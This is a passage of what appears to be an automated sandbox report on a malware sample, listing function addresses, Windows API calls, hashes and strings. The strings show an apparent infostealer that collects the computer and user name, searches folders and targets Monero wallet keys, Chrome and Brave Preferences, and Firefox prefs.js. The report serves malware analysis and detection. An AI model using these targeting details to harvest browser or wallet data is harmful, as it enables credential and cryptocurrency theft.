                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 02516f5f1b3f5607d876505ce93a3488eaf95873dedd292dded64b913e29915e
                              • Instruction ID: ecae6e923dbeba5f43f361d47fcfbf0b856b201300d35bc6f65f3a8f7b7bea7a
                              • Opcode Fuzzy Hash: 02516f5f1b3f5607d876505ce93a3488eaf95873dedd292dded64b913e29915e
                              • Instruction Fuzzy Hash: D0E086B0945308FBE7106FE4DC0AB5976B9AB04B41F501045F70C761D0C6F42601DA99
                              Function 004B10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 004B10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 004B10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: ee37af1c63ea29a5aca4e73542c6e5ca034bc19339ba1fce887beb772f6553bc
                              • Instruction ID: 85eaf6f0c8a51f8f6d961b1e23f3acc360b71f2c83914b551a4770298aaa2d51
                              • Opcode Fuzzy Hash: ee37af1c63ea29a5aca4e73542c6e5ca034bc19339ba1fce887beb772f6553bc
                              • Instruction Fuzzy Hash: 3AF0E2B1641208BBE714AAA4AC59FBBB7E8E705B15F301449F508E3390D572AE00CAA4
                              Function 004B1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004C7910
                                • Part of subcall function 004C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 004C7917
                                • Part of subcall function 004C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 004C792F
                                • Part of subcall function 004C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004B11B7), ref: 004C7880
                                • Part of subcall function 004C7850: RtlAllocateHeap.NTDLL(00000000), ref: 004C7887
                                • Part of subcall function 004C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 004C789F
                              • ExitProcess.KERNEL32 ref: 004B11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: aea2721a39c0bcf5d269df57df09b4770b3533dc56b82cbf6c773e1c049601aa
                              • Instruction ID: 0084573136a055217c28127e946d0208b9d06df6cdc7133af3ad5f7a2f48e7ee
                              • Opcode Fuzzy Hash: aea2721a39c0bcf5d269df57df09b4770b3533dc56b82cbf6c773e1c049601aa
                              • Instruction Fuzzy Hash: 25E0ECB991420153DB4073F6AC1AF3A329D5B14749F04142EFA09D6212FA2DE810C97E

                              Non-executed Functions

                              Function 004C38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 004C38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 004C38E3
                              • lstrcat.KERNEL32(?,?), ref: 004C3935
                              • StrCmpCA.SHLWAPI(?,004D0F70), ref: 004C3947
                              • StrCmpCA.SHLWAPI(?,004D0F74), ref: 004C395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004C3C67
                              • FindClose.KERNEL32(000000FF), ref: 004C3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: ed583191c8e42f49262e66cf0607a2252b4dcd5539ef59fd43472825e3fc2f83
                              • Instruction ID: 8f505088b01c009137ca7a1c1483ec8cd08b5cc6756e274cdefee1f1cfc8dea3
                              • Opcode Fuzzy Hash: ed583191c8e42f49262e66cf0607a2252b4dcd5539ef59fd43472825e3fc2f83
                              • Instruction Fuzzy Hash: BBA144B5A002089BDB64DFA4DC85FFE7379BB48301F04858DE50D96141EB759B84CF66
                              Function 004BBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • FindFirstFileA.KERNEL32(00000000,?,004D0B32,004D0B2B,00000000,?,?,?,004D13F4,004D0B2A), ref: 004BBEF5
                              • StrCmpCA.SHLWAPI(?,004D13F8), ref: 004BBF4D
                              • StrCmpCA.SHLWAPI(?,004D13FC), ref: 004BBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004BC7BF
                              • FindClose.KERNEL32(000000FF), ref: 004BC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 5efa547ddcdf29f1f0021673d73b861e615dfdea39395ae8c47068c5680e3476
                              • Instruction ID: 07b84cbb9f25d09f3126fa60ff3cb40eb26f17e1cab1acfd8dea37b141685fea
                              • Opcode Fuzzy Hash: 5efa547ddcdf29f1f0021673d73b861e615dfdea39395ae8c47068c5680e3476
                              • Instruction Fuzzy Hash: 5D4295759001086BCB54FB71DC96FED733DAB44308F40456EB90A92191EE38AF59CBBA
                              Function 004C4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 004C492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 004C4943
                              • StrCmpCA.SHLWAPI(?,004D0FDC), ref: 004C4971
                              • StrCmpCA.SHLWAPI(?,004D0FE0), ref: 004C4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004C4B7D
                              • FindClose.KERNEL32(000000FF), ref: 004C4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 2d3dd20e4916ca8d2173ed8f203ca5f3f2efa374201cf9fa11d30ddb17489e9b
                              • Instruction ID: 74da1eeb2daad9bf4b26c3aee106d89fe49534d872ac96a606737860a9350af8
                              • Opcode Fuzzy Hash: 2d3dd20e4916ca8d2173ed8f203ca5f3f2efa374201cf9fa11d30ddb17489e9b
                              • Instruction Fuzzy Hash: 2A6152B5900218ABCB60EBE0DD59FFA737DBB88700F04458EB50D96140EA75EB85CFA5
                              Function 004C4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004C4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004C4587
                              • wsprintfA.USER32 ref: 004C45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 004C45BD
                              • StrCmpCA.SHLWAPI(?,004D0FC4), ref: 004C45EB
                              • StrCmpCA.SHLWAPI(?,004D0FC8), ref: 004C4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004C468B
                              • FindClose.KERNEL32(000000FF), ref: 004C46A0
                              • lstrcat.KERNEL32(?,0118E200), ref: 004C46C5
                              • lstrcat.KERNEL32(?,0118D400), ref: 004C46D8
                              • lstrlen.KERNEL32(?), ref: 004C46E5
                              • lstrlen.KERNEL32(?), ref: 004C46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 0ed87950c620b1e737bfe66426581f633d9ad997f5b64d6774f82bbaa1350507
                              • Instruction ID: fafd45903f10486f990e0a56214ba62726778c45cdd62763b6270d044c8a6d3a
                              • Opcode Fuzzy Hash: 0ed87950c620b1e737bfe66426581f633d9ad997f5b64d6774f82bbaa1350507
                              • Instruction Fuzzy Hash: 885176B5500218ABC760EBB0DD99FFE737DAB58304F40458DB60D92150EB799B84CFA6
                              Function 004C3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 004C3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 004C3EDA
                              • StrCmpCA.SHLWAPI(?,004D0FAC), ref: 004C3F08
                              • StrCmpCA.SHLWAPI(?,004D0FB0), ref: 004C3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004C406C
                              • FindClose.KERNEL32(000000FF), ref: 004C4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: d1df7232fafa5dc7ae84494cc291eb19cd8d17542ed2bbe994ce632f33049d5b
                              • Instruction ID: 88b20409446f0aa390e48f68e0aaadf0a69fc2ec2465c75258ee2b674a39bd10
                              • Opcode Fuzzy Hash: d1df7232fafa5dc7ae84494cc291eb19cd8d17542ed2bbe994ce632f33049d5b
                              • Instruction Fuzzy Hash: A35142F6900218ABCB24EBA0DC85FFA737DBB48304F40458DB65D96140DA799B85CF65
                              Function 004BED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 004BED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 004BED55
                              • StrCmpCA.SHLWAPI(?,004D1538), ref: 004BEDAB
                              • StrCmpCA.SHLWAPI(?,004D153C), ref: 004BEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004BF2AE
                              • FindClose.KERNEL32(000000FF), ref: 004BF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: bf01abaf92eaf767ac9f80bc95e1485b7ce6be381491b72575ae753e4b945c29
                              • Instruction ID: 732296a75813256952124475540e7518014baa8cbcdcc4ddde6f7b0b7d7bd478
                              • Opcode Fuzzy Hash: bf01abaf92eaf767ac9f80bc95e1485b7ce6be381491b72575ae753e4b945c29
                              • Instruction Fuzzy Hash: EFE1107581111C9BDB94FB61DC52FEE7338AF54308F4045AEB40A62052EE386F9ACF69
                              Function 004BF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004D15B8,004D0D96), ref: 004BF71E
                              • StrCmpCA.SHLWAPI(?,004D15BC), ref: 004BF76F
                              • StrCmpCA.SHLWAPI(?,004D15C0), ref: 004BF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004BFAB1
                              • FindClose.KERNEL32(000000FF), ref: 004BFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 4ce20eb790db5cac9cf98f9f947b1fda22836072bec71bca7af50b85d4018359
                              • Instruction ID: d34a4d7dab3b2975787c204f69b493deea7507ba852b315a469b3c64141b9a03
                              • Opcode Fuzzy Hash: 4ce20eb790db5cac9cf98f9f947b1fda22836072bec71bca7af50b85d4018359
                              • Instruction Fuzzy Hash: 1FB1A5759001089BCB64FF61DC56FEE7379AF54308F0081AEA40E96151EF389B59CFAA
                              Function 004B16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004D510C,?,?,?,004D51B4,?,?,00000000,?,00000000), ref: 004B1923
                              • StrCmpCA.SHLWAPI(?,004D525C), ref: 004B1973
